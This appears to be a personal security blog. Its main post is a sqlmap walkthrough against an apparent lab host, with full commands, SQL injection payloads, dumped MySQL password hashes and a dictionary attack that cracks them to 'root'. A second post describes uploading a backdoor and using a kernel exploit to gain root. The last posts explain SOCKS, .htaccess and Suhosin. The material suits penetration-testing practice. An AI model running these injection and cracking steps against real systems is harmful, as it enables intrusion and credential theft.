Create Backdoor From MySQL
Manusia Tak Sempurna

I scan with sqlmap and this is the syntax

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" --dbs --level=5 --risk=3
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:36:50

[22:36:51] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[22:36:51] [INFO] resuming injection data from session file
[22:36:51] [INFO] resuming injection data from session file
[22:36:51] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:36:51] [INFO] testing connection to the target url
[22:36:51] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---
[22:36:51] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[22:36:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:36:58] [INFO] fetching database names
[22:36:58] [INFO] fetching number of databases
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 9
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': information_schema
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': Joomla
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': dvwa
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': mysql
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': phpmyadmin
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': test
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': webku
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': webku3
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': wordpress
available databases [9]:
[*] dvwa
[*] information_schema
[*] Joomla
[*] mysql
[*] phpmyadmin
[*] test
[*] webku
[*] webku3
[*] wordpress

[22:36:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at: 22:36:58

and the I try to search for a username and password from the database with sqlmap

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" -D phpmyadmin -T user --password --level=5 --risk=3

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:37:51

[22:37:52] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[22:37:52] [INFO] resuming injection data from session file
[22:37:52] [INFO] resuming injection data from session file
[22:37:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:37:52] [INFO] testing connection to the target url
[22:37:52] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---

[22:37:52] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[22:37:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:37:54] [INFO] fetching database users password hashes
[22:37:54] [INFO] fetching database users
[22:37:54] [INFO] fetching number of database users
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 5
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'localhost'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'pakdhe-laptop'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'127.0.0.1'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'debian-sys-maint'@'localhost'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'phpmyadmin'@'localhost'
[22:37:54] [INFO] fetching number of password hashes for user 'root'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 2
[22:37:54] [INFO] fetching password hashes for user 'root'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[22:37:54] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 1
[22:37:54] [INFO] fetching password hashes for user 'debian-sys-maint'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *896747F40953077D8AB58F8A3002427D8DC256FE
[22:37:54] [INFO] fetching number of password hashes for user 'phpmyadmin'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 1
[22:37:54] [INFO] fetching password hashes for user 'phpmyadmin'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[22:37:57] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[22:37:58] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[22:38:02] [INFO] starting dictionary attack (mysql_passwd)
[22:38:04] [INFO] found: 'root' for user: 'root'                                                                                                                                              
[22:38:05] [INFO] found: 'root' for user: 'phpmyadmin'                                                                                                                                        
database management system users password hashes:                                                                                                                                            
[*] debian-sys-maint [1]:
    password hash: *896747F40953077D8AB58F8A3002427D8DC256FE
[*] phpmyadmin [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
[*] root [2]:
    password hash: *7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root

[22:39:55] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at: 22:39:55

Then I try to connect from sqlmap tp to the shell of mysql

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" -D phpmyadmin -T user --sql-shell --level=5 --risk=3

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 08:27:56

[08:27:56] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[08:27:56] [INFO] resuming injection data from session file
[08:27:56] [INFO] resuming injection data from session file
[08:27:56] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:27:56] [INFO] testing connection to the target url
[08:27:56] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---

[08:27:56] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 1
[08:27:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[08:27:59] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> show databases;
do you want to retrieve the SQL statement output? [Y/n/a] y
[08:28:18] [INFO] fetching SQL SELECT statement query output: 'show databases;'
[08:28:18] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[08:28:18] [INFO] retrieved:
sql-shell>

But seems it can't connect

to be continued................

0 comments | | edit post
Server Exploit
Manusia Tak Sempurna
To exploit a server I use scanner to know the aplication running on the system, after I scan i got the result but the aplication is the latest version show I can break the system over the aplication.

Then I just exploring the web menu to menu on the web. I find a vulner on the upload file on the web. I just test to upload some picture to the web and it success, i try try to upload some file with extension .txt and it success to. Maybe the developer web is not sanitaze the file can be upload.

Then I just upload a backdoor that I have prepared, I just upload the backdoor to the web and it succesfully uploaded. Now i search where the file has been upload and i found it. After i running the backdoor  i try to exploit the kernel on the system. I search the exploit kernel and i found it I just upload the exploit kernel under the backdoor on the web.

After that i just run the exploit on the kernel to gained the full access as root and it is work. Now I have full access to the system.
0 comments | | edit post
SOCKS
Manusia Tak Sempurna

SOCKS is a network protocol designed to allow clients to communicate with Internet servers through firewalls. SOCKS is typically implemented on proxy servers. It is supported as a proxy configuration option in popular Web browsers and instant messaging programs. SOCKS can also be found in some VPN implementations.
Multiple versions of the SOCKS protocol exist including SOCKS v4 and SOCKS v5. SOCKS v4 uses TCP as a transport, while SOCKS v5 also supports UDP. The base SOCKS v5 specification is RFC 1928 with additional details captured in RFC 1929 and RFC 1961.

reference :


0 comments | | edit post
htaccess
Manusia Tak Sempurna
htaccess file is an ASCII text file located in the root directory is usually "public_html" isoften used to change the default settings of the web server used.
htaccess can be use to
- blocking specific ip address
- redirect old pages to the new pages
- preventing exploration to the directory
0 comments | | edit post
PHP Suhosin
Manusia Tak Sempurna
Suhosin is an advanced protection system for PHP installations. It was designed to protect servers and users from known and unknown flaws in PHP applications and the PHP core. Suhosin comes in two independent parts, that can be used separately or in combination. The first part is a small patch against the PHP core, that implements a few low-level protections against bufferoverflows or format string vulnerabilities and the second part is a powerful PHP extension that implements all the other protections.

Feature List
Engine Protection (only with patch)

  • Protects the internal memory manager against bufferoverflows with Canary and SafeUnlink Protection
  • Protects Destructors of Zend Hashtables
  • Protects Destructors of Zend Linked-Lists
  • Protects the PHP core and extensions against format string vulnerabilities
  • Protects against errors in certain libc realpath() implementations

Misc Features
  • Protection Simulation mode
  • Adds the functions sha256() and sha256_file() to the PHP core
  • Adds support for CRYPT_BLOWFISH to crypt() on all platforms
  • Transparent protection of open phpinfo() pages
  • EXPERIMENTAL SQL database user protection

Runtime Protection
  • Transparent Cookie Encryption
  • Protects against different kinds of (Remote-)Include Vulnerabilities 
  • disallows Remote URL inclusion (optional: black-/whitelisting), disallows inclusiong of uploaded files, optionally stops directory traversal attacks
  • Allows disabling the preg_replace() /e modifier
  • Allows disabling eval()
  • Protects against infinite recursion through a configureabel maximum execution depth
  • Supports per Virtual Host / Directory configureable function black- and whitelists
  • Supports a separated function black- and whitelist for evaluated code
  • Protects against HTTP Response Splitting Vulnerabilities
  • Protects against scripts manipulating the memory_limit
  • Protects PHP‘s superglobals against extract() and import_request_vars()
  • Adds protection against newline attacks to mail()
  • Adds protection against \0 attack on preg_replace()

Session Protection
  • Transparent encryption of session data
  • Transparent session hijacking protection
  • Protection against overlong session identifiers
  • Protection against malicious chars in session identifiers
Filtering Features


  • Filters ASCIIZ characters from user input
  • Ignores GET, POST, COOKIE variables with the following names:

              GLOBALS, _COOKIE, _ENV, _FILES, _GET, _POST, _REQUEST
              _SERVER, _SESSION, HTTP_COOKIE_VARS, HTTP_ENV_VARS
              HTTP_GET_VARS, HTTP_POST_VARS, HTTP_POST_FILES
              HTTP_RAW_POST_DATA, HTTP_SERVER_VARS, HTTP_SESSION_VARS

  • Allows enforcing limits on REQUEST variables or separated by type (GET, POST, COOKIE)

             Supports a number of variables per request limit
             Supports a maximum length of variable names [with and without indicies]
             Supports a maximum length of array indicies
             Supports a maximum length of variable values
             Supports a maximum depth of arrays

  • Allows only a configureable number of uploaded files
  • Supports verification of uploaded files through an external script
  • Supports automatic banning of uploaded ELF executables
  • Supports automatic banning of uploaded binary files
  • Supports automatic stripping of binary content in uploaded files
  • Configureable action on violation

                     just block violating variables
                     send HTTP response code
                     redirect the browser
                     execute another PHP script

Logging Features

  • Supports multiple log devices (syslog, SAPI module error log, external logging script)
  • Supports freely configureable syslog facility and priority
  • Supports log device separated selection of alert types to log
  • Alerts contain filename and linenumber that triggered it
  • Alerts contain the IP address of the user triggering it
  • The IP Address can also be extracted from X-Forwarded-For HTTP headers (f.e. for reverse proxy setups)




0 comments | | edit post